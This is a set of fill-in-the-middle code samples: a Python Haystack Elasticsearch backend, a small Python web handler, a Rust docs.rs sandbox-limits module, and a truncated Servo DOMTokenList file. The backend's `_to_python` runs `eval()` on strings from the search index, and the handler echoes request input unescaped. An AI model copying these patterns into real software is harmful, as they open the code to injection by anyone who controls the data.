r'(?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2})(\.\d+)?$')
class ElasticsearchSearchBackend(BaseSearchBackend):
# Word reserved by Elasticsearch for special use.
RESERVED_WORDS = (
'AND',
'NOT',
'OR',
'TO',
)
# Characters reserved by Elasticsearch for special use.
# The '\\' must come first, so as not to overwrite the other slash replacements.
RESERVED_CHARACTERS = (
'\\', '+', '-', '&&', '||', '!', '(', ')', '{', '}',
'[', ']', '^', '"', '~', '*', '?', ':', '/',
)
# Settings to add an n-gram & edge n-gram analyzer.
DEFAULT_SETTINGS = {
'settings': {
"analysis": {
"analyzer": {
"ngram_analyzer": {
"type": "custom",
"tokenizer": "lowercase",
"filter": ["haystack_ngram"]
},
"edgengram_analyzer": {
"type": "custom",
"tokenizer": "lowercase",
"filter": ["haystack_edgengram"]
}
},
"tokenizer": {
"haystack_ngram_tokenizer": {
"type": "nGram",
"min_gram": 3,<|fim▁hole|> "haystack_edgengram_tokenizer": {
"type": "edgeNGram",
"min_gram": 2,
"max_gram": 15,
"side": "front"
}
},
"filter": {
"haystack_ngram": {
"type": "nGram",
"min_gram": 3,
"max_gram": 15
},
"haystack_edgengram": {
"type": "edgeNGram",
"min_gram": 2,
"max_gram": 15
}
}
}
}
}
def __init__(self, connection_alias, **connection_options):
super(ElasticsearchSearchBackend, self).__init__(connection_alias, **connection_options)
if not 'URL' in connection_options:
raise ImproperlyConfigured("You must specify a 'URL' in your settings for connection '%s'." % connection_alias)
if not 'INDEX_NAME' in connection_options:
raise ImproperlyConfigured("You must specify a 'INDEX_NAME' in your settings for connection '%s'." % connection_alias)
self.conn = pyelasticsearch.ElasticSearch(connection_options['URL'], timeout=self.timeout)
self.index_name = connection_options['INDEX_NAME']
self.log = logging.getLogger('haystack')
self.setup_complete = False
self.existing_mapping = {}
def setup(self):
"""
Defers loading until needed.
"""
# Get the existing mapping & cache it. We'll compare it
# during the ``update`` & if it doesn't match, we'll put the new
# mapping.
try:
self.existing_mapping = self.conn.get_mapping(index=self.index_name)
except Exception:
if not self.silently_fail:
raise
unified_index = haystack.connections[self.connection_alias].get_unified_index()
self.content_field_name, field_mapping = self.build_schema(unified_index.all_searchfields())
current_mapping = {
'modelresult': {
'properties': field_mapping,
'_boost': {
'name': 'boost',
'null_value': 1.0
}
}
}
if current_mapping != self.existing_mapping:
try:
# Make sure the index is there first.
self.conn.create_index(self.index_name, self.DEFAULT_SETTINGS)
self.conn.put_mapping(self.index_name, 'modelresult', current_mapping)
self.existing_mapping = current_mapping
except Exception:
if not self.silently_fail:
raise
self.setup_complete = True
def update(self, index, iterable, commit=True):
if not self.setup_complete:
try:
self.setup()
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to add documents to Elasticsearch: %s", e)
return
prepped_docs = []
for obj in iterable:
try:
prepped_data = index.full_prepare(obj)
final_data = {}
# Convert the data to make sure it's happy.
for key, value in prepped_data.items():
final_data[key] = self._from_python(value)
prepped_docs.append(final_data)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
# We'll log the object identifier but won't include the actual object
# to avoid the possibility of that generating encoding errors while
# processing the log message:
self.log.error(u"%s while preparing object for update" % e.__class__.__name__, exc_info=True, extra={
"data": {
"index": index,
"object": get_identifier(obj)
}
})
self.conn.bulk_index(self.index_name, 'modelresult', prepped_docs, id_field=ID)
if commit:
self.conn.refresh(index=self.index_name)
def remove(self, obj_or_string, commit=True):
doc_id = get_identifier(obj_or_string)
if not self.setup_complete:
try:
self.setup()
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to remove document '%s' from Elasticsearch: %s", doc_id, e)
return
try:
self.conn.delete(self.index_name, 'modelresult', doc_id)
if commit:
self.conn.refresh(index=self.index_name)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to remove document '%s' from Elasticsearch: %s", doc_id, e)
def clear(self, models=[], commit=True):
# We actually don't want to do this here, as mappings could be
# very different.
# if not self.setup_complete:
# self.setup()
try:
if not models:
self.conn.delete_index(self.index_name)
else:
models_to_delete = []
for model in models:
models_to_delete.append("%s:%s.%s" % (DJANGO_CT, model._meta.app_label, model._meta.module_name))
# Delete by query in Elasticsearch asssumes you're dealing with
# a ``query`` root object. :/
query = {'query_string': {'query': " OR ".join(models_to_delete)}}
self.conn.delete_by_query(self.index_name, 'modelresult', query)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
if len(models):
self.log.error("Failed to clear Elasticsearch index of models '%s': %s", ','.join(models_to_delete), e)
else:
self.log.error("Failed to clear Elasticsearch index: %s", e)
def build_search_kwargs(self, query_string, sort_by=None, start_offset=0, end_offset=None,
fields='', highlight=False, facets=None,
date_facets=None, query_facets=None,
narrow_queries=None, spelling_query=None,
within=None, dwithin=None, distance_point=None,
models=None, limit_to_registered_models=None,
result_class=None):
index = haystack.connections[self.connection_alias].get_unified_index()
content_field = index.document_field
if query_string == '*:*':
kwargs = {
'query': {
'filtered': {
'query': {
"match_all": {}
},
},
},
}
else:
kwargs = {
'query': {
'filtered': {
'query': {
'query_string': {
'default_field': content_field,
'default_operator': DEFAULT_OPERATOR,
'query': query_string,
'analyze_wildcard': True,
'auto_generate_phrase_queries': True,
},
},
},
},
}
if fields:
if isinstance(fields, (list, set)):
fields = " ".join(fields)
kwargs['fields'] = fields
if sort_by is not None:
order_list = []
for field, direction in sort_by:
if field == 'distance' and distance_point:
# Do the geo-enabled sort.
lng, lat = distance_point['point'].get_coords()
sort_kwargs = {
"_geo_distance": {
distance_point['field']: [lng, lat],
"order": direction,
"unit": "km"
}
}
else:
if field == 'distance':
warnings.warn("In order to sort by distance, you must call the '.distance(...)' method.")
# Regular sorting.
sort_kwargs = {field: {'order': direction}}
order_list.append(sort_kwargs)
kwargs['sort'] = order_list
# From/size offsets don't seem to work right in Elasticsearch's DSL. :/
# if start_offset is not None:
# kwargs['from'] = start_offset
# if end_offset is not None:
# kwargs['size'] = end_offset - start_offset
if highlight is True:
kwargs['highlight'] = {
'fields': {
content_field: {'store': 'yes'},
}
}
if self.include_spelling:
kwargs['suggest'] = {
'suggest': {
'text': spelling_query or query_string,
'term': {
# Using content_field here will result in suggestions of stemmed words.
'field': '_all',
},
},
}
if narrow_queries is None:
narrow_queries = set()
if facets is not None:
kwargs.setdefault('facets', {})
for facet_fieldname, extra_options in facets.items():
facet_options = {
'terms': {
'field': facet_fieldname,
'size': 100,
},
}
# Special cases for options applied at the facet level (not the terms level).
if extra_options.pop('global_scope', False):
# Renamed "global_scope" since "global" is a python keyword.
facet_options['global'] = True
if 'facet_filter' in extra_options:
facet_options['facet_filter'] = extra_options.pop('facet_filter')
facet_options['terms'].update(extra_options)
kwargs['facets'][facet_fieldname] = facet_options
if date_facets is not None:
kwargs.setdefault('facets', {})
for facet_fieldname, value in date_facets.items():
# Need to detect on gap_by & only add amount if it's more than one.
interval = value.get('gap_by').lower()
# Need to detect on amount (can't be applied on months or years).
if value.get('gap_amount', 1) != 1 and not interval in ('month', 'year'):
# Just the first character is valid for use.
interval = "%s%s" % (value['gap_amount'], interval[:1])
kwargs['facets'][facet_fieldname] = {
'date_histogram': {
'field': facet_fieldname,
'interval': interval,
},
'facet_filter': {
"range": {
facet_fieldname: {
'from': self._from_python(value.get('start_date')),
'to': self._from_python(value.get('end_date')),
}
}
}
}
if query_facets is not None:
kwargs.setdefault('facets', {})
for facet_fieldname, value in query_facets:
kwargs['facets'][facet_fieldname] = {
'query': {
'query_string': {
'query': value,
}
},
}
if limit_to_registered_models is None:
limit_to_registered_models = getattr(settings, 'HAYSTACK_LIMIT_TO_REGISTERED_MODELS', True)
if models and len(models):
model_choices = sorted(['%s.%s' % (model._meta.app_label, model._meta.module_name) for model in models])
elif limit_to_registered_models:
# Using narrow queries, limit the results to only models handled
# with the current routers.
model_choices = self.build_models_list()
else:
model_choices = []
if len(model_choices) > 0:
if narrow_queries is None:
narrow_queries = set()
narrow_queries.add('%s:(%s)' % (DJANGO_CT, ' OR '.join(model_choices)))
if narrow_queries:
kwargs['query'].setdefault('filtered', {})
kwargs['query']['filtered'].setdefault('filter', {})
kwargs['query']['filtered']['filter'] = {
'fquery': {
'query': {
'query_string': {
'query': u' AND '.join(list(narrow_queries)),
},
},
'_cache': True,
}
}
if within is not None:
from haystack.utils.geo import generate_bounding_box
((min_lat, min_lng), (max_lat, max_lng)) = generate_bounding_box(within['point_1'], within['point_2'])
within_filter = {
"geo_bounding_box": {
within['field']: {
"top_left": {
"lat": max_lat,
"lon": min_lng
},
"bottom_right": {
"lat": min_lat,
"lon": max_lng
}
}
},
}
kwargs['query'].setdefault('filtered', {})
kwargs['query']['filtered'].setdefault('filter', {})
if kwargs['query']['filtered']['filter']:
compound_filter = {
"and": [
kwargs['query']['filtered']['filter'],
within_filter,
]
}
kwargs['query']['filtered']['filter'] = compound_filter
else:
kwargs['query']['filtered']['filter'] = within_filter
if dwithin is not None:
lng, lat = dwithin['point'].get_coords()
dwithin_filter = {
"geo_distance": {
"distance": dwithin['distance'].km,
dwithin['field']: {
"lat": lat,
"lon": lng
}
}
}
kwargs['query'].setdefault('filtered', {})
kwargs['query']['filtered'].setdefault('filter', {})
if kwargs['query']['filtered']['filter']:
compound_filter = {
"and": [
kwargs['query']['filtered']['filter'],
dwithin_filter
]
}
kwargs['query']['filtered']['filter'] = compound_filter
else:
kwargs['query']['filtered']['filter'] = dwithin_filter
# Remove the "filtered" key if we're not filtering. Otherwise,
# Elasticsearch will blow up.
if not kwargs['query']['filtered'].get('filter'):
kwargs['query'] = kwargs['query']['filtered']['query']
return kwargs
@log_query
def search(self, query_string, **kwargs):
if len(query_string) == 0:
return {
'results': [],
'hits': 0,
}
if not self.setup_complete:
self.setup()
search_kwargs = self.build_search_kwargs(query_string, **kwargs)
search_kwargs['from'] = kwargs.get('start_offset', 0)
order_fields = set()
for order in search_kwargs.get('sort', []):
for key in order.keys():
order_fields.add(key)
geo_sort = '_geo_distance' in order_fields
end_offset = kwargs.get('end_offset')
start_offset = kwargs.get('start_offset', 0)
if end_offset is not None and end_offset > start_offset:
search_kwargs['size'] = end_offset - start_offset
try:
raw_results = self.conn.search(search_kwargs,
index=self.index_name,
doc_type='modelresult')
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to query Elasticsearch using '%s': %s", query_string, e)
raw_results = {}
return self._process_results(raw_results,
highlight=kwargs.get('highlight'),
result_class=kwargs.get('result_class', SearchResult),
distance_point=kwargs.get('distance_point'), geo_sort=geo_sort)
def more_like_this(self, model_instance, additional_query_string=None,
start_offset=0, end_offset=None, models=None,
limit_to_registered_models=None, result_class=None, **kwargs):
from haystack import connections
if not self.setup_complete:
self.setup()
# Deferred models will have a different class ("RealClass_Deferred_fieldname")
# which won't be in our registry:
model_klass = model_instance._meta.concrete_model
index = connections[self.connection_alias].get_unified_index().get_index(model_klass)
field_name = index.get_content_field()
params = {}
if start_offset is not None:
params['search_from'] = start_offset
if end_offset is not None:
params['search_size'] = end_offset - start_offset
doc_id = get_identifier(model_instance)
try:
raw_results = self.conn.more_like_this(self.index_name, 'modelresult', doc_id, [field_name], **params)
except (requests.RequestException, pyelasticsearch.ElasticHttpError) as e:
if not self.silently_fail:
raise
self.log.error("Failed to fetch More Like This from Elasticsearch for document '%s': %s", doc_id, e)
raw_results = {}
return self._process_results(raw_results, result_class=result_class)
def _process_results(self, raw_results, highlight=False,
result_class=None, distance_point=None,
geo_sort=False):
from haystack import connections
results = []
hits = raw_results.get('hits', {}).get('total', 0)
facets = {}
spelling_suggestion = None
if result_class is None:
result_class = SearchResult
if self.include_spelling and 'suggest' in raw_results:
raw_suggest = raw_results['suggest']['suggest']
spelling_suggestion = ' '.join([word['text'] if len(word['options']) == 0 else word['options'][0]['text'] for word in raw_suggest])
if 'facets' in raw_results:
facets = {
'fields': {},
'dates': {},
'queries': {},
}
for facet_fieldname, facet_info in raw_results['facets'].items():
if facet_info.get('_type', 'terms') == 'terms':
facets['fields'][facet_fieldname] = [(individual['term'], individual['count']) for individual in facet_info['terms']]
elif facet_info.get('_type', 'terms') == 'date_histogram':
# Elasticsearch provides UTC timestamps with an extra three
# decimals of precision, which datetime barfs on.
facets['dates'][facet_fieldname] = [(datetime.datetime.utcfromtimestamp(individual['time'] / 1000), individual['count']) for individual in facet_info['entries']]
elif facet_info.get('_type', 'terms') == 'query':
facets['queries'][facet_fieldname] = facet_info['count']
unified_index = connections[self.connection_alias].get_unified_index()
indexed_models = unified_index.get_indexed_models()
content_field = unified_index.document_field
for raw_result in raw_results.get('hits', {}).get('hits', []):
source = raw_result['_source']
app_label, model_name = source[DJANGO_CT].split('.')
additional_fields = {}
model = get_model(app_label, model_name)
if model and model in indexed_models:
for key, value in source.items():
index = unified_index.get_index(model)
string_key = str(key)
if string_key in index.fields and hasattr(index.fields[string_key], 'convert'):
additional_fields[string_key] = index.fields[string_key].convert(value)
else:
additional_fields[string_key] = self._to_python(value)
del(additional_fields[DJANGO_CT])
del(additional_fields[DJANGO_ID])
if 'highlight' in raw_result:
additional_fields['highlighted'] = raw_result['highlight'].get(content_field, '')
if distance_point:
additional_fields['_point_of_origin'] = distance_point
if geo_sort and raw_result.get('sort'):
from haystack.utils.geo import Distance
additional_fields['_distance'] = Distance(km=float(raw_result['sort'][0]))
else:
additional_fields['_distance'] = None
result = result_class(app_label, model_name, source[DJANGO_ID], raw_result['_score'], **additional_fields)
results.append(result)
else:
hits -= 1
return {
'results': results,
'hits': hits,
'facets': facets,
'spelling_suggestion': spelling_suggestion,
}
def build_schema(self, fields):
content_field_name = ''
mapping = {}
for field_name, field_class in fields.items():
field_mapping = {
'boost': field_class.boost,
'index': 'analyzed',
'store': 'yes',
'type': 'string',
}
if field_class.document is True:
content_field_name = field_class.index_fieldname
# DRL_FIXME: Perhaps move to something where, if none of these
# checks succeed, call a custom method on the form that
# returns, per-backend, the right type of storage?
if field_class.field_type in ['date', 'datetime']:
field_mapping['type'] = 'date'
elif field_class.field_type == 'integer':
field_mapping['type'] = 'long'
elif field_class.field_type == 'float':
field_mapping['type'] = 'float'
elif field_class.field_type == 'boolean':
field_mapping['type'] = 'boolean'
elif field_class.field_type == 'ngram':
field_mapping['analyzer'] = "ngram_analyzer"
elif field_class.field_type == 'edge_ngram':
field_mapping['analyzer'] = "edgengram_analyzer"
elif field_class.field_type == 'location':
field_mapping['type'] = 'geo_point'
# The docs claim nothing is needed for multivalue...
# if field_class.is_multivalued:
# field_data['multi_valued'] = 'true'
if field_class.stored is False:
field_mapping['store'] = 'no'
# Do this last to override `text` fields.
if field_class.indexed is False or hasattr(field_class, 'facet_for'):
field_mapping['index'] = 'not_analyzed'
if field_mapping['type'] == 'string' and field_class.indexed:
field_mapping["term_vector"] = "with_positions_offsets"
if not hasattr(field_class, 'facet_for') and not field_class.field_type in('ngram', 'edge_ngram'):
field_mapping["analyzer"] = "snowball"
mapping[field_class.index_fieldname] = field_mapping
return (content_field_name, mapping)
def _iso_datetime(self, value):
"""
If value appears to be something datetime-like, return it in ISO format.
Otherwise, return None.
"""
if hasattr(value, 'strftime'):
if hasattr(value, 'hour'):
return value.isoformat()
else:
return '%sT00:00:00' % value.isoformat()
def _from_python(self, value):
"""Convert more Python data types to ES-understandable JSON."""
iso = self._iso_datetime(value)
if iso:
return iso
elif isinstance(value, six.binary_type):
# TODO: Be stricter.
return six.text_type(value, errors='replace')
elif isinstance(value, set):
return list(value)
return value
def _to_python(self, value):
"""Convert values from ElasticSearch to native Python values."""
if isinstance(value, (int, float, complex, list, tuple, bool)):
return value
if isinstance(value, six.string_types):
possible_datetime = DATETIME_REGEX.search(value)
if possible_datetime:
date_values = possible_datetime.groupdict()
for dk, dv in date_values.items():
date_values[dk] = int(dv)
return datetime.datetime(
date_values['year'], date_values['month'],
date_values['day'], date_values['hour'],
date_values['minute'], date_values['second'])
try:
# This is slightly gross but it's hard to tell otherwise what the
# string's original type might have been. Be careful who you trust.
converted_value = eval(value)
# Try to handle most built-in types.
if isinstance(
converted_value,
(int, list, tuple, set, dict, float, complex)):
return converted_value
except Exception:
# If it fails (SyntaxError or its ilk) or we don't trust it,
# continue on.
pass
return value
# Sucks that this is almost an exact copy of what's in the Solr backend,
# but we can't import due to dependencies.
class ElasticsearchSearchQuery(BaseSearchQuery):
def matching_all_fragment(self):
return '*:*'
def add_spatial(self, lat, lon, sfield, distance, filter='bbox'):
"""Adds spatial query parameters to search query"""
kwargs = {
'lat': lat,
'long': long,
'sfield': sfield,
'distance': distance,
}
self.spatial_query.update(kwargs)
def add_order_by_distance(self, lat, long, sfield):
"""Orders the search result by distance from point."""
kwargs = {
'lat': lat,
'long': long,
'sfield': sfield,
}
self.order_by_distance.update(kwargs)
def build_query_fragment(self, field, filter_type, value):
from haystack import connections
query_frag = ''
if not hasattr(value, 'input_type_name'):
# Handle when we've got a ``ValuesListQuerySet``...
if hasattr(value, 'values_list'):
value = list(value)
if isinstance(value, six.string_types):
# It's not an ``InputType``. Assume ``Clean``.
value = Clean(value)
else:
value = PythonData(value)
# Prepare the query using the InputType.
prepared_value = value.prepare(self)
if not isinstance(prepared_value, (set, list, tuple)):
# Then convert whatever we get back to what pysolr wants if needed.
prepared_value = self.backend._from_python(prepared_value)
# 'content' is a special reserved word, much like 'pk' in
# Django's ORM layer. It indicates 'no special field'.
if field == 'content':
index_fieldname = ''
else:
index_fieldname = u'%s:' % connections[self._using].get_unified_index().get_index_fieldname(field)
filter_types = {
'contains': u'%s',
'startswith': u'%s*',
'exact': u'%s',
'gt': u'{%s TO *}',
'gte': u'[%s TO *]',
'lt': u'{* TO %s}',
'lte': u'[* TO %s]',
}
if value.post_process is False:
query_frag = prepared_value
else:
if filter_type in ['contains', 'startswith']:
if value.input_type_name == 'exact':
query_frag = prepared_value
else:
# Iterate over terms & incorportate the converted form of each into the query.
terms = []
if isinstance(prepared_value, six.string_types):
for possible_value in prepared_value.split(' '):
terms.append(filter_types[filter_type] % self.backend._from_python(possible_value))
else:
terms.append(filter_types[filter_type] % self.backend._from_python(prepared_value))
if len(terms) == 1:
query_frag = terms[0]
else:
query_frag = u"(%s)" % " AND ".join(terms)
elif filter_type == 'in':
in_options = []
for possible_value in prepared_value:
in_options.append(u'"%s"' % self.backend._from_python(possible_value))
query_frag = u"(%s)" % " OR ".join(in_options)
elif filter_type == 'range':
start = self.backend._from_python(prepared_value[0])
end = self.backend._from_python(prepared_value[1])
query_frag = u'["%s" TO "%s"]' % (start, end)
elif filter_type == 'exact':
if value.input_type_name == 'exact':
query_frag = prepared_value
else:
prepared_value = Exact(prepared_value).prepare(self)
query_frag = filter_types[filter_type] % prepared_value
else:
if value.input_type_name != 'exact':
prepared_value = Exact(prepared_value).prepare(self)
query_frag = filter_types[filter_type] % prepared_value
if len(query_frag) and not isinstance(value, Raw):
if not query_frag.startswith('(') and not query_frag.endswith(')'):
query_frag = "(%s)" % query_frag
return u"%s%s" % (index_fieldname, query_frag)
def build_alt_parser_query(self, parser_name, query_string='', **kwargs):
if query_string:
kwargs['v'] = query_string
kwarg_bits = []
for key in sorted(kwargs.keys()):
if isinstance(kwargs[key], six.string_types) and ' ' in kwargs[key]:
kwarg_bits.append(u"%s='%s'" % (key, kwargs[key]))
else:
kwarg_bits.append(u"%s=%s" % (key, kwargs[key]))
return u"{!%s %s}" % (parser_name, ' '.join(kwarg_bits))
def build_params(self, spelling_query=None, **kwargs):
search_kwargs = {
'start_offset': self.start_offset,
'result_class': self.result_class
}
order_by_list = None
if self.order_by:
if order_by_list is None:
order_by_list = []
for field in self.order_by:
direction = 'asc'
if field.startswith('-'):
direction = 'desc'
field = field[1:]
order_by_list.append((field, direction))
search_kwargs['sort_by'] = order_by_list
if self.date_facets:
search_kwargs['date_facets'] = self.date_facets
if self.distance_point:
search_kwargs['distance_point'] = self.distance_point
if self.dwithin:
search_kwargs['dwithin'] = self.dwithin
if self.end_offset is not None:
search_kwargs['end_offset'] = self.end_offset
if self.facets:
search_kwargs['facets'] = self.facets
if self.fields:
search_kwargs['fields'] = self.fields
if self.highlight:
search_kwargs['highlight'] = self.highlight
if self.models:
search_kwargs['models'] = self.models
if self.narrow_queries:
search_kwargs['narrow_queries'] = self.narrow_queries
if self.query_facets:
search_kwargs['query_facets'] = self.query_facets
if self.within:
search_kwargs['within'] = self.within
if spelling_query:
search_kwargs['spelling_query'] = spelling_query
return search_kwargs
def run(self, spelling_query=None, **kwargs):
"""Builds and executes the query. Returns a list of search results."""
final_query = self.build_query()
search_kwargs = self.build_params(spelling_query, **kwargs)
results = self.backend.search(final_query, **search_kwargs)
self._results = results.get('results', [])
self._hit_count = results.get('hits', 0)
self._facet_counts = self.post_process_facets(results)
self._spelling_suggestion = results.get('spelling_suggestion', None)
def run_mlt(self, **kwargs):
"""Builds and executes the query. Returns a list of search results."""
if self._more_like_this is False or self._mlt_instance is None:
raise MoreLikeThisError("No instance was provided to determine 'More Like This' results.")
additional_query_string = self.build_query()
search_kwargs = {
'start_offset': self.start_offset,
'result_class': self.result_class,
'models': self.models
}
if self.end_offset is not None:
search_kwargs['end_offset'] = self.end_offset - self.start_offset
results = self.backend.more_like_this(self._mlt_instance, additional_query_string, **search_kwargs)
self._results = results.get('results', [])
self._hit_count = results.get('hits', 0)
class ElasticsearchSearchEngine(BaseEngine):
backend = ElasticsearchSearchBackend
query = ElasticsearchSearchQuery<|fim▁end|>
|
"max_gram": 15,
},
|
<|file_name|>test.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from wrapper import get, run
import logging
import requests
@get('/')
def f(*args, **kwargs):
return '<html><head></head><body><h1>Hello!</h1></body></html>'
@get('/test', ['php'])
def test_f(*args, **kwargs):
arguments = kwargs['arguments']
php = arguments['php'][0]
self = args[0]
self.write("Head")
return 'Test{}'.format(php)
def test():
run(8888)
def main():
pass
if __name__ == '__main__':
test()<|fim▁end|>
| |
<|file_name|>limits.rs<|end_file_name|><|fim▁begin|>use crate::error::Result;
use postgres::Connection;
use std::collections::BTreeMap;
use std::time::Duration;
#[derive(Debug, Clone, PartialEq, Eq)]
pub(crate) struct Limits {
memory: usize,
targets: usize,
timeout: Duration,
networking: bool,
max_log_size: usize,
}
impl Default for Limits {
fn default() -> Self {
Self {
memory: 3 * 1024 * 1024 * 1024, // 3 GB
timeout: Duration::from_secs(15 * 60), // 15 minutes
targets: 10,
networking: false,
max_log_size: 100 * 1024, // 100 KB
}
}
}
impl Limits {
pub(crate) fn for_crate(conn: &Connection, name: &str) -> Result<Self> {
let mut limits = Self::default();
let res = conn.query(
"SELECT * FROM sandbox_overrides WHERE crate_name = $1;",
&[&name],
)?;
if !res.is_empty() {
let row = res.get(0);
if let Some(memory) = row.get::<_, Option<i64>>("max_memory_bytes") {
limits.memory = memory as usize;
}
if let Some(timeout) = row.get::<_, Option<i32>>("timeout_seconds") {
limits.timeout = Duration::from_secs(timeout as u64);
}
if let Some(targets) = row.get::<_, Option<i32>>("max_targets") {
limits.targets = targets as usize;
}
}
Ok(limits)
}
pub(crate) fn memory(&self) -> usize {
self.memory
}
pub(crate) fn timeout(&self) -> Duration {
self.timeout
}
pub(crate) fn networking(&self) -> bool {
self.networking
}
pub(crate) fn max_log_size(&self) -> usize {
self.max_log_size
}
pub(crate) fn targets(&self) -> usize {
self.targets
}
pub(crate) fn for_website(&self) -> BTreeMap<String, String> {<|fim▁hole|> res.insert("Available RAM".into(), SIZE_SCALE(self.memory));
res.insert(
"Maximum rustdoc execution time".into(),
TIME_SCALE(self.timeout.as_secs() as usize),
);
res.insert(
"Maximum size of a build log".into(),
SIZE_SCALE(self.max_log_size),
);
if self.networking {
res.insert("Network access".into(), "allowed".into());
} else {
res.insert("Network access".into(), "blocked".into());
}
res.insert(
"Maximum number of build targets".into(),
self.targets.to_string(),
);
res
}
}
const TIME_SCALE: fn(usize) -> String = |v| scale(v, 60, &["seconds", "minutes", "hours"]);
const SIZE_SCALE: fn(usize) -> String = |v| scale(v, 1024, &["bytes", "KB", "MB", "GB"]);
fn scale(value: usize, interval: usize, labels: &[&str]) -> String {
let (mut value, interval) = (value as f64, interval as f64);
let mut chosen_label = &labels[0];
for label in &labels[1..] {
if value / interval >= 1.0 {
chosen_label = label;
value /= interval;
} else {
break;
}
}
// 2.x
let mut value = format!("{:.1}", value);
// 2.0 -> 2
if value.ends_with(".0") {
value.truncate(value.len() - 2);
}
format!("{} {}", value, chosen_label)
}
#[cfg(test)]
mod test {
use super::*;
use crate::test::*;
#[test]
fn retrieve_limits() {
wrapper(|env| {
let db = env.db();
let krate = "hexponent";
// limits work if no crate has limits set
let hexponent = Limits::for_crate(&db.conn(), krate)?;
assert_eq!(hexponent, Limits::default());
db.conn().query(
"INSERT INTO sandbox_overrides (crate_name, max_targets) VALUES ($1, 15)",
&[&krate],
)?;
// limits work if crate has limits set
let hexponent = Limits::for_crate(&db.conn(), krate)?;
assert_eq!(
hexponent,
Limits {
targets: 15,
..Limits::default()
}
);
// all limits work
let krate = "regex";
let limits = Limits {
memory: 100_000,
timeout: Duration::from_secs(300),
targets: 1,
..Limits::default()
};
db.conn().query(
"INSERT INTO sandbox_overrides (crate_name, max_memory_bytes, timeout_seconds, max_targets)
VALUES ($1, $2, $3, $4)",
&[&krate, &(limits.memory as i64), &(limits.timeout.as_secs() as i32), &(limits.targets as i32)]
)?;
assert_eq!(limits, Limits::for_crate(&db.conn(), krate)?);
Ok(())
});
}
#[test]
fn display_limits() {
let limits = Limits {
memory: 102_400,
timeout: Duration::from_secs(300),
targets: 1,
..Limits::default()
};
let display = limits.for_website();
assert_eq!(display.get("Network access"), Some(&"blocked".into()));
assert_eq!(
display.get("Maximum size of a build log"),
Some(&"100 KB".into())
);
assert_eq!(
display.get("Maximum number of build targets"),
Some(&limits.targets.to_string())
);
assert_eq!(
display.get("Maximum rustdoc execution time"),
Some(&"5 minutes".into())
);
assert_eq!(display.get("Available RAM"), Some(&"100 KB".into()));
}
#[test]
fn scale_limits() {
// time
assert_eq!(TIME_SCALE(300), "5 minutes");
assert_eq!(TIME_SCALE(1), "1 seconds");
assert_eq!(TIME_SCALE(7200), "2 hours");
// size
assert_eq!(SIZE_SCALE(1), "1 bytes");
assert_eq!(SIZE_SCALE(100), "100 bytes");
assert_eq!(SIZE_SCALE(1024), "1 KB");
assert_eq!(SIZE_SCALE(10240), "10 KB");
assert_eq!(SIZE_SCALE(1_048_576), "1 MB");
assert_eq!(SIZE_SCALE(10_485_760), "10 MB");
assert_eq!(SIZE_SCALE(1_073_741_824), "1 GB");
assert_eq!(SIZE_SCALE(10_737_418_240), "10 GB");
assert_eq!(SIZE_SCALE(std::u32::MAX as usize), "4 GB");
// fractional sizes
assert_eq!(TIME_SCALE(90), "1.5 minutes");
assert_eq!(TIME_SCALE(5400), "1.5 hours");
assert_eq!(SIZE_SCALE(1_288_490_189), "1.2 GB");
assert_eq!(SIZE_SCALE(3_758_096_384), "3.5 GB");
assert_eq!(SIZE_SCALE(1_048_051_712), "999.5 MB");
}
}<|fim▁end|>
|
let mut res = BTreeMap::new();
|
<|file_name|>domtokenlist.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::attr::Attr;
use dom::bindings::codegen::Bindings::DOMTokenListBinding;
use dom::bindings::codegen::Bindings::DOMTokenListBinding::DOMTokenListMethods;
use dom::bindings::error::{Error, ErrorResult, Fallible};
use dom::bindings::global::GlobalRef;
use dom::bindings::js::{JS, Root};
use dom::bindings::utils::{Reflector, reflect_dom_object};
use dom::element::Element;
use dom::node::window_from_node;
use std::borrow::ToOwned;
use string_cache::Atom;
use util::str::{DOMString, HTML_SPACE_CHARACTERS, str_join};
#[dom_struct]
pub struct DOMTokenList {
reflector_: Reflector,
element: JS<Element>,
local_name: Atom,
}
impl DOMTokenList {
pub fn new_inherited(element: &Element, local_name: Atom) -> DOMTokenList {
DOMTokenList {
reflector_: Reflector::new(),
element: JS::from_ref(element),
local_name: local_name,
}
}
pub fn new(element: &Element, local_name: &Atom) -> Root<DOMTokenList> {
let window = window_from_node(element);
reflect_dom_object(box DOMTokenList::new_inherited(element, local_name.clone()),
GlobalRef::Window(window.r()),
DOMTokenListBinding::Wrap)
}
fn attribute(&self) -> Option<Root<Attr>> {
let element = self.element.root();
element.r().get_attribute(&ns!(""), &self.local_name)
}
fn check_token_exceptions(&self, token: &str) -> Fallible<Atom> {
match token {
"" => Err(Error::Syntax),
slice if slice.find(HTML_SPACE_CHARACTERS).is_some() => Err(Error::InvalidCharacter),
slice => Ok(Atom::from_slice(slice))
}
}
}
// https://dom.spec.whatwg.org/#domtokenlist
impl DOMTokenListMethods for DOMTokenList {
// https://dom.spec.whatwg.org/#dom-domtokenlist-length
fn Length(&self) -> u32 {
self.attribute().map(|attr| {
let attr = attr.r();
attr.value().as_tokens().len()
}).unwrap_or(0) as u32
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-item
fn Item(&self, index: u32) -> Option<DOMString> {
self.attribute().and_then(|attr| {
let attr = attr.r();
Some(attr.value().as_tokens()).and_then(|tokens| {
tokens.get(index as usize).map(|token| (**token).to_owned())
})
})
}
// https://dom.spec.whatwg.org/#dom-domtokenlist-contains
fn Contains(&self, token: DOMString) -> Fallible<bool> {
self.check_token_exceptions(&token).map(|token| {
self.attribute().map(|attr| {
let attr = attr.r();<|fim▁hole|> .as_tokens()
.iter()
.any(|atom: &Atom| *atom == token)
